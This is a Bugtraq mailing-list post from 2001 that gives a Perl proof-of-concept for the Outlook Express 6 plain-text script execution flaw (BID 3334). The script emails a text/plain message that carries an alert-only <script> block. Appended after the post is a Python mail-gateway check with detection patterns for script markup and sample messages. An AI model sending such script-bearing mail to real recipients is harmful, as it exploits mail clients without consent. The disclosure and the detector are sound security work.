Bugtraq mailing list archives

Proof-Of-Concept Perl Script for Bugtraq-ID: #3334


From: Mario Schmidt <info () pcfon de>
Date: 15 Sep 2001 18:17:22 -0000

Saturday, September 15, 2001

Following is a Proof-Of-Concept script, written in Perl, for the Bugtraq-ID: #3334 security issue,
named "Microsoft Outlook Express 6 Plain Text Message Script Execution". Credit for this
issue goes to http-equiv () excite com [mailto:http-equiv () excite com], who originally found
this bug.

Usage of this script is very simple. Edit the Perl script and add your favourite SMTP mail host
and your e-mail address as the program parameters, and finally execute it.

The script is available for download as bug3334.pl [http://pcfon.de/ms.security/bug3334.pl].

#!/usr/local/bin/perl
#
# bug3334.pl
#
# ms.security
#
# Microsoft Outlook Express 6
# Plain Text Message Script Execution
#
# Proof-Of-Concept Perl Script
#
# Version: [0.0.1]
# Last Edit: [2001-09-15]
# Coding: ms.security [info () pcfon de]
#
# Bugtraq: #3334 [http://www.securityfocus.com/bid/3334]
# Credit: http-equiv () excite com [http-equiv () excite com]
#

use Net::SMTP;                                  # smtp mailer

# *** Program parameter ***

$mailer='mailhost';                             # smtp host
$to='your () e-mail com';                       # receiver address

# *** Program information ***

@info=
(
  "\nms.security\n\n",
  "Microsoft Outlook Express 6\n",
  "Plain Text Message Script Execution\n\n",
  "Proof-Of-Concept Perl Script\n\n",
  "Version: [0.0.1]\n",
  "Last Edit: [2001-09-15]\n",
  "Coding: ms.security [info\@pcfon.de]\n\n",
  "Bugtraq: #3334 [http://www.securityfocus.com/bid/3334]\n",
  "Credit: http-equiv\@excite.com [http-equiv\@excite.com]\n\n"
);

# *** Message header ***

@header=
(
  'To: ',$to,"\n",
  "MIME-Version: 1.0\n",
  "Content-Type: text/plain\n",
  "charset=\"Windows-1252\"\n",
  "Content-Transfer-Encoding: 7bit\n",
  "X-Priority: 3\n",
  "X-MSMail-Priority: Normal\n",
  "X-Mailer: Microsoft Outlook Express 6.00.2600.0000\n",
  "X-MIMEOLE: Produced By Microsoft MimeOLE V6.00.2600.0000\n",
  "\n"
);

# *** JavaScript code ***

@script=
(
  "<script>",
  "alert(\"freak\");",
  "alert(\"show\")",
  "</script>"
);

# *** Mail message via smtp mailer ***

print @info;                                    # info message
print "Connecting to $mailer ...\n";            # debug message
$smtp = Net::SMTP->new($mailer);                # smtp constructor
$smtp->mail($to);                               # mail method
$smtp->to($to);                                 # to method
print "Sending messaging to $to ...\n";         # debug message
$smtp->data();                                  # begin of data
$smtp->datasend(@header);                       # message header
$smtp->datasend(@script);                       # script code
$smtp->dataend();                               # end of data
$smtp->quit;                                    # terminate smtp
print "Done.\n";                                # debug message

# (c) 2001, ms.security, Germany. All rights reserved.

ms.security
M. Schmidt 

Web: http://pcfon.de/ms.security/
Mail: mailto:info () pcfon de
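
A mail-gateway check for the message shape this script sends (a text/plain part whose body carries script markup), as an added example that is not part of the original post or the author's code. The function name, the pattern list and the sample messages are assumptions constructed for illustration.

```python
import re
from email import message_from_string

# Markup that has no business in a text/plain body: script tags and a few
# inline event handlers. Assumed pattern list; tune it for your own mail flow.
ACTIVE = re.compile(r"<\s*script\b|\bon(?:load|error|click)\s*=", re.I)

def plain_parts_with_script(raw):
    """Return (content_type, matched_text) for every text/plain part
    whose decoded body contains active markup."""
    hits = []
    for part in message_from_string(raw).walk():
        if part.is_multipart() or part.get_content_type() != "text/plain":
            continue  # HTML parts belong to a separate sanitising step
        payload = part.get_payload(decode=True) or b""
        charset = part.get_content_charset() or "latin-1"
        try:
            text = payload.decode(charset, "replace")
        except LookupError:  # unknown charset label in the header
            text = payload.decode("latin-1")
        match = ACTIVE.search(text)
        if match:
            hits.append((part.get_content_type(), match.group(0)))
    return hits

# Constructed sample: same shape as the proof-of-concept message.
SAMPLE_SCRIPT = (
    "To: user@example.com\n"
    "MIME-Version: 1.0\n"
    'Content-Type: text/plain; charset="Windows-1252"\n'
    "Content-Transfer-Encoding: 7bit\n"
    "\n"
    '<script>alert("test")</script>\n'
)
# Constructed sample: ordinary plain-text mail.
SAMPLE_BENIGN = (
    "To: user@example.com\n"
    "Content-Type: text/plain; charset=us-ascii\n"
    "\n"
    "Meeting moved to 10:00.\n"
)
# Constructed sample: HTML mail, outside the scope of this check.
SAMPLE_HTML = (
    "To: user@example.com\n"
    "Content-Type: text/html; charset=us-ascii\n"
    "\n"
    "<html><script>x()</script></html>\n"
)

if __name__ == "__main__":
    for name in ("SAMPLE_SCRIPT", "SAMPLE_BENIGN", "SAMPLE_HTML"):
        print(name, plain_parts_with_script(globals()[name]))
```

A hit is a reason to quarantine or to rewrite the part so the client cannot treat it as HTML; a message with no Content-Type header is also checked, because the parser defaults it to text/plain.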

